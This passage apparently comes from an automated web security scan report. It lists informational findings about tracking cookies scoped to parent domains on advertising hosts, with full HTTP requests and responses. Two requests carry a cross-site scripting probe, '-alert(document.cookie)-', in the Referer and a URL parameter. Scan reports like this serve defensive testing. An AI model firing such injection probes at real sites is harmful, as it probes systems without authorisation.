P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 297
Date: Tue, 25 Jan 2011 03:06:32 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['D08734_72132','D08734_72122','D08734_72123','D08734_72125','D08734_72126','D08734_71432'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D087
...[SNIP]...

13.135. http://pix04.revsci.net/D08734/a3/0/3/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
  • udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a3/0/3/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Frl.com%253F&_rlcdnsegs= HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; 
rsi_us_1000000=pUMdJD2nyBcc1A0Q8ow0pM8gvg74F8hOVRxIycUhWjXI8gGTTZkZzXl4PCwq7QqVt1jxpAPDzqONXq/SDIt6Z/n+buGa6m/oqaICNlsCp1Mmx9NM7pL6Y27DJE9vzDLZWgw4J9LBtxRtpXy9fQP1qz/YFy5djLvmQ1axeGnbixda0WlTs1fvVPJ4j9XBlxKDqMEk/ZdmARBJgJnVnp0SEvPrpB9XnOJVKWRSN57hd4oeqp13L3yu0muCEBrPe2+LJrmMkqCh7HCN28EcXnaWNYcHQbaU66Jc5rq/5idcbd5kSa2CoFTd0cp6AefiizaxjQhyZK49hI1/MRY3Rj3MGP1IHp0il8hNIHzM4xckWgGbYaOpNbd4OPX/3vaPG1jYgA8SApt7aAdtgNmJASAitd+XQitPSH6vsr8P5mDu117hc4MbcebGUJ9m1wooAKc4hMFuIV1hyVJo7TFU2VLRwKBWtN42XQUiPXXAtLavYVcwiX+aH3135smhdT7xRtFKyQAuLhytEizSz0g59GLmqkgRB/oHOrM0otWp2HIHmTCadUkGeWmHP6iODtxbFdST0uJE1SxuwcudHmV9ol3vLWk5sSreso+DkDKD/zun4aK60os8ZyTljfxQ7Z25bppWh8cAwZCwT1kFe7rTQpzup0orsQseD8dmf+D+brQ7hVQtd+0bYQJRtvd9edhyN21hJYfsYL2/o9aCVPeIiTKwP3IxuVtNh0W+gRVIw9WFNJzP+vNK0qK4X7HJewXCt+eKAOlAhMrm2C7mVwF5nAWa6AAYz2WOUhoN0C+sJoYIEyOoVrXbsoWHDWwYiJCR9UEqZPsviYYNEHXPQ+9UMWfUlRLU50X1zZH3utPaZx1OvfKpnB8kD5obOu4VlLkhpoI/dxDBcZFVNKKe63NjRH3hO9B3fwSms/ZAODtoku7MUAr4VhBEZ4/zFgGwgoE4iqs5r8Djyf1i4AbO+bM56Jv9rrQFJlY4v45CaBomTbH6Hb6dvs00HpMsGi/CKwymodfxaboEtFuMlPxjvA8=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:23:40 GMT

GIF89a.............!.......,...........D..;

13.136. http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07610/b3/0/3/1003161/657607877.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
  • NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
  • rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /G07610/b3/0/3/1003161/657607877.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.parenthood.com%252F%253Fd1907'-alert(document.cookie)-'807a8eb3eff%253D1%2526bpid%253DS024%2525204%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F57%26DM_EOM%3D1&C=G07610 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; rsi_us_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
Set-Cookie: NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
Set-Cookie: rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:23:11 GMT

GIF89a.............!.......,...........D..;

13.137. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
  • NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=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; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; rsi_us_1000000=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; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 22:48:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

13.138. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
  • rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
  • NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.autobytel.com%252Fx22%253FChannel%253D%2526Make%253D%2526Category%253D%2526Site%253DAutobytel.com%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F31%26DM_EOM%3D1&C=K04491 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
Set-Cookie: rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
Set-Cookie: NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 21:06:44 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

13.139. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=141&cgn=13888&seg=6770 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295482376917

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 01:35:46 GMT
Server: 33X6
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Location: http://segment-pixel.invitemedia.com/pixel?partnerID=38&key=segment&code=6770&random=303331
Content-Length: 0
Set-Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


13.140. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
  • uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=1524&mt_adid=221 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1295637719; uuid=4d3702bc-839e-0690-5370-3c19a9561295

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-n1a pid 0x12c2 4802
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 25 Jan 2011 01:35:47 GMT
Etag: 4d3702bc-839e-0690-5370-3c19a9561295
Connection: Keep-Alive
Set-Cookie: ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.141. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

